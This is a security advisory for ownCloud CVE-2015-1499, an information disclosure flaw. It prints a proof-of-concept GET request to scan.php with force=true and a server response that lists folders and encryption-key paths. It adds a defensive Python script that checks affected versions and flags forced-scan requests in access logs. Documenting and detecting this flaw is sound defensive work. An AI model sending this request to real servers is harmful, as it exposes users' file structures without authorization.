
ownCloud information disclosure vulnerability (CVE-2015-1499)
Published: 2016-01-07
Updated: 2016-01-08

Affected systems:
ownCloud ownCloud <= 8.2.1
ownCloud ownCloud <= 8.1.4
ownCloud ownCloud <= 8.0.9
Description:
CVE(CAN) ID: CVE-2015-1499

ownCloud is an open-source file synchronization and sharing solution.

ownCloud versions <= 8.2.1, <= 8.1.4 and <= 8.0.9 contain an information disclosure vulnerability in directory listing. The flaw lies in the "force" parameter of index.php/apps/files/ajax/scan.php: by setting that parameter to "true", an attacker can obtain the complete directory structure together with information about every file in it.

<*Source: Adam Mariš
  *>

Test method:
Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear the risk themselves! Adam Mariš () provided the following test method:

GET /index.php/apps/files/ajax/scan.php?force=true&dir=&requesttoken=<VALIDREQUESTTOKEN> HTTP/1.1
Host: [HOST]
Accept: text/event-stream
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: [REFERER]
Cookie: [COOKIES]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache


Server response (shortened):

event: user
data: "[ID]"

event: folder
data: "/"

event: count
data: 21

event: count
data: 42

event: count
data: 63

event: folder
data: "/[ID]"

event: folder
data: "/[ID]/cache"

event: folder
data: "/[ID]6/files"

event: folder
data: "/[ID]/files_encryption"

[...]

event: folder
data: "/[ID]/files_encryption/keys/files/[FILENAME].zip"

event: folder
data: "/[ID]/files_encryption/keys/files/[FILENAME].zip/OC_DEFAULT_MODULE"

event: folder
data: "/[ID]/files_encryption/keys/files/[FILENAME].pptx"

[...]
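As an added defensive example (it is not part of the advisory and not ownCloud project code), the following Python script covers two checks a practitioner would want after reading the affected-version list and the test request above: `is_affected()` tells whether a given ownCloud version string falls within the ranges the advisory lists, and `find_forced_scans()` flags web-server access log entries for the scan.php endpoint that carry `force=true`, the request shape shown in the test method. The log lines, IP addresses, usernames and request tokens are constructed sample data, the log format is assumed to be the common combined format, and all function names are my own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Inclusive upper bounds per release branch, exactly as listed in the advisory.
AFFECTED_CEILINGS = {
    (8, 2): (8, 2, 1),
    (8, 1): (8, 1, 4),
    (8, 0): (8, 0, 9),
}

# Endpoint named in the advisory; compared with endswith() because an
# instance may be served from a sub-path such as /owncloud/.
SCAN_PATH = "/index.php/apps/files/ajax/scan.php"


def parse_version(text):
    """Turn '8.2.1' (or '8.2.1RC1') into a comparable (major, minor, patch) tuple."""
    nums = []
    for part in text.strip().split(".")[:3]:
        m = re.match(r"\d+", part)
        if not m:
            raise ValueError(f"unparseable version component: {part!r}")
        nums.append(int(m.group()))
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums)


def is_affected(version_text):
    """True if the version lies inside one of the advisory's affected ranges."""
    v = parse_version(version_text)
    branch = v[:2]
    if branch in AFFECTED_CEILINGS:
        return v <= AFFECTED_CEILINGS[branch]
    # Branches the advisory does not name: anything below 8.0 is covered by the
    # literal "<= 8.0.9" range; 8.3+ and 9.x are newer than every listed ceiling.
    return v < (8, 0, 0)


# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_log_line(line):
    """Parse one access-log line; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    # keep_blank_values so that 'dir=' (root scan) survives as an empty string
    entry["query"] = {
        k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()
    }
    return entry


def is_forced_scan(entry):
    """A scan.php request with force=true is the pattern from the advisory."""
    return (
        entry is not None
        and entry["path"].endswith(SCAN_PATH)
        and entry["query"].get("force", "").lower() == "true"
    )


def find_forced_scans(lines):
    """Return (ip, user, timestamp, dir) for every forced-scan request found."""
    hits = []
    for line in lines:
        entry = parse_log_line(line)
        if is_forced_scan(entry):
            hits.append((entry["ip"], entry["user"], entry["ts"], entry["query"].get("dir", "")))
    return hits


# Constructed sample log lines; addresses are documentation ranges, tokens are dummies.
SAMPLE_LOG = [
    '203.0.113.7 - alice [07/Jan/2016:10:15:02 +0000] "GET /index.php/apps/files/ajax/scan.php?force=true&dir=&requesttoken=abc HTTP/1.1" 200 8841',
    '203.0.113.7 - alice [07/Jan/2016:10:15:40 +0000] "GET /index.php/apps/files/ajax/scan.php?dir=%2FDocuments&requesttoken=abc HTTP/1.1" 200 312',
    '198.51.100.9 - bob [07/Jan/2016:10:16:11 +0000] "GET /owncloud/index.php/apps/files/ajax/scan.php?force=True&dir=%2F&requesttoken=xyz HTTP/1.1" 200 9230',
    '198.51.100.9 - bob [07/Jan/2016:10:16:30 +0000] "GET /index.php/apps/files/ajax/list.php?dir=%2F HTTP/1.1" 200 1502',
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for ver in ("8.2.1", "8.2.2", "8.1.5", "8.0.9"):
        print(f"ownCloud {ver}: {'AFFECTED' if is_affected(ver) else 'not affected'}")
    for ip, user, ts, d in find_forced_scans(SAMPLE_LOG):
        print(f"forced scan from {ip} as {user} at {ts}, dir={d!r}")
```

The second, non-forced scan.php request in the sample is deliberately left unflagged: ordinary use of the files app also hits that endpoint, so alerting on the path alone would be noisy; the `force=true` parameter is what distinguishes the pattern this advisory describes.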

Recommendation:
Vendor patch:

ownCloud
--------
The vendor has released an upgrade patch that fixes this security issue; please download it from the vendor's homepage:

https://owncloud.org/security/advisory/?id=oc-sa-2016-002